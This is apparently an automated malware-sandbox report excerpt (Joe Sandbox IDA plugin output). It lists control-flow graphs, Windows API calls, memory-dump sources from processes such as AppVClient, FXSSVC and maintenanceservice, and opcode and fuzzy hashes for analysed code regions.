                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 246 535d50-535d5b CreateThread 247 535c78 246->247 248 535d1f-535d45 247->248 249 535c7e 247->249 252 535d47 248->252 253 535cd4-535cea CreateThread CloseHandle 248->253 249->248 250 535c84 249->250 250->246 252->253 254 535cf0-535d4d 253->254 255 535d8b-535d92 253->255 258 535d94 254->258 255->258 259 535d9c 255->259 262 535cb3 258->262 263 535c2c-535c2f 258->263 261 535da5-535db6 call 5352d0 259->261 271 535c30-535c39 261->271 272 535dbc 261->272 262->263 264 535cb9-535cbd 262->264 266 535cc3 264->266 267 535d56-535d5b CreateThread 264->267 266->267 269 535cc9 266->269 267->247 269->267 271->264 279 535bf7 271->279 273 535dbe 272->273 274 535d7d-535d89 272->274 273->274 280 535d9b 273->280 274->255 274->258 279->264 281 535bfd-535c06 279->281 280->259 281->261
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 283 535990-53599b 285 535a33-535a61 call 569b00 283->285 286 5359a1 283->286 296 535a63 285->296 297 535ab4-535aba call 551080 285->297 286->285 288 5359a7-5359ab 286->288 292 5359b1-5359f3 call 562320 288->292 293 535a59 288->293 292->293 312 5359f5-5359fa 292->312 294 535a25-535a2d 293->294 295 535a5b 293->295 300 535a70-535a7b 294->300 301 535a2f 294->301 295->294 309 535a23 295->309 296->297 304 535a65 296->304 315 535a83-535a88 call 535df0 297->315 318 535a13 297->318 307 535a16-535a1e call 551470 300->307 308 535a7d 300->308 301->304 304->300 324 535a96-535ac2 307->324 308->307 310 535a7f-535a81 308->310 311 535a24 309->311 310->315 316 535a51-535a54 call 56233c 312->316 317 5359fc 312->317 325 535a8d VirtualAlloc 315->325 316->293 317->316 321 5359fe-535a02 317->321 318->315 323 535a15 318->323 321->316 323->307 324->311 327 535ac8 324->327 325->324 327->311 328 535ace 327->328 328->285
APIs
Memory Dump Source
• Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0

Control-flow Graph (legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Control-flow Graph (legend: Executed / Not Executed)
APIs
• CloseHandle.KERNELBASE ref: 0053830B
• GetTokenInformation.KERNELBASE ref: 00538369
Memory Dump Source
• Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0

Control-flow Graph (legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 59
Total number of Limit Nodes: 4

Control-flow Graph (legend: Executed, Not Executed)
Memory Dump Source
• Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c8230a2eb981ff393e97a97b92db0fb30d945c4e69a5d3befe7b4714f1a8aa4
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0C22173CE2585DB2C962AB85923B61C1A799361FE4871B9017C92D4EA3C8902A20E

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b6339ee052ab74e45394ecfbfa9780cc58f342633f9b7c36086998f7d2e7aa79
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB09201239EA68502252731240812A05842A466349F49BAA9B7307AD2E9280C05632E

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5301dff3261b40f52b23e75ab60d64307709ea7da11dab68c04a07b62adf5307
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0921982172DEB48BD76A9318749727725A2B7A5324FD803CBD086C7392D93C4D45924F

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2230a71c37f606e3275c3ae52cc0225e72bf23885a3112329a9137899428871d
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F04F3470EA718BC6269718B05043FABB0AA51710BD900EFD846CB657CE1C9C06936A

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0042830B
                                                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00428369
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e961fba32d1a1562996a88a92dc1d71db4a98c059d6e1fdd72eb63cffae70605
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F04F3470A575DBCA259A18B44053F66A0AA61750BE800AFC846CB352CF2DDC46E66F

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6bc8ae829301df2f5c39c5b8946e9ae91c93d1cf9969dff47ee7a86ecba7dafe
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49F0493470A975DB86259618B44053FA6B0AB61700BE800AFC846CB762CF2DAC46E76F

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b69cad99d21e6cbb3459d2b2d30165f2ce8950f566ad22f938a820a0c56cf772
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B1493153CA968BC7298BD98484275BB91FF85318F18C259DC8BCB26DDBF49892C353

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: faefc440a9211e883ac53558ebc5393f135b1984b497e1e3efdf3eea10b4608d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ce0cbe75a1f611dd7c7adcad305539cb868bd85103931a08780d2ba648eba41
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faefc440a9211e883ac53558ebc5393f135b1984b497e1e3efdf3eea10b4608d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99411C31239A7A8FDB6897F8845C33976E1EB45325FC4C1A6EC06CB1ADDBB58420C742

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83a4bf01300eedd0214b9b4b5f6bfa8d7fe2fb78569bea2f30ab15a28b6f76fb
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0F62263D96785DB2C82F8885933A61C1A789236FD4C75EFC57C90ECDBB58131C205

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47d31120db517c4ebad1fa4244cda7866d40a170fc4b8afb638e67c6add7f1f9
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58B0120203AAAB45001553B0040822885802F4E03CBF89FBDFF73068EEDB6114249320

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 88ec71e40fa197054b4ddaa2347ac7898f40e37a13d83128b2bf038de933d4cc
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB21C83153DBB54BC76A93E8449037526A2BB85328FC88187FC86C719DDB7C893CC642

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f279f2fee6088f9cc4045afa2729bf2fd11706bbbbd160ac4c40def327419c5
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0862453EAF39BC62A87D490545356FA0AF82214B99C08ADC86CB95ED7F8DC82C753

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0225830B
                                                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 02258369
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08f1bf94d75151fe88a691c97637ce5ac8602b8b7ef88d974d407a6f0a022228
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F0622543D6B39B8A2546D485446352B506E42154BACC449CC46CB92ED7F8D8C1C753

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0